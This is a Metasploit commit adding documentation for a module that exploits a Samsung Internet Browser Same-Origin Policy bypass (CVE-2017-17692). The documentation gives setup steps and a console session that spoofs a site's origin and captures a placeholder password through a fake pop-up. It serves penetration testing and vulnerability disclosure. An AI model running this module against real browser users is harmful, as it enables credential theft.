Land rapid7#9311, docs for rapid7#9180

Tod Beardsley · Tod Beardsley · commit 4aa480d65567 · 2017-12-18T17:34:55.000-06:00
diff --git a/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md b/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md
@@ -0,0 +1,56 @@
+## Description
+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
+## Vulnerable Application
+This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
+
+## Verification Steps
+1. Start `msfconsole -q`
+2. `use auxiliary/gather/samsung_browser_sop_bypass`
+3. `set SRVHOST`
+4. `set SRVPORT`
+5. `set URIPATH`
+6. `set TARGET_URL`
+5. `run`
+
+## Scenarios
+```
+$ sudo msfconsole -q 
+msf > use auxiliary/gather/samsung_browser_sop_bypass 
+msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104
+SRVHOST => 192.168.1.104
+msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090
+SRVPORT => 9090
+msf auxiliary(samsung_browser_sop_bypass) > set URIPATH /
+URIPATH => /
+msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.com/csi
+TARGET_URL => https://www.google.com/csi
+msf auxiliary(samsung_browser_sop_bypass) > run
+[*] Auxiliary module execution completed
+msf auxiliary(samsung_browser_sop_bypass) > 
+[*] Using URL: http://192.168.1.104:9090/
+[*] Server started.
+[*] 192.168.1.101: Request 'GET /'
+[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
+[*] 192.168.1.101: Request 'GET /favicon.ico'
+[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
+[*] 192.168.1.101: Request 'GET /favicon.ico'
+[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi
+[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword
+
+msf auxiliary(samsung_browser_sop_bypass) > creds 
+Credentials
+===========
+
+host            origin          service          public          private                                                            realm                       private_type
+----            ------          -------          ------          -------                                                            -----                       ------------
+                                                 emailID         MyStrongPassword                                                   https://www.google.com/csi  Password
+
+msf auxiliary(samsung_browser_sop_bypass) > 
+```
+
+## Demos
+
+Working of MSF Module: `https://youtu.be/ulU98cWVhoI` 
+
+Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`
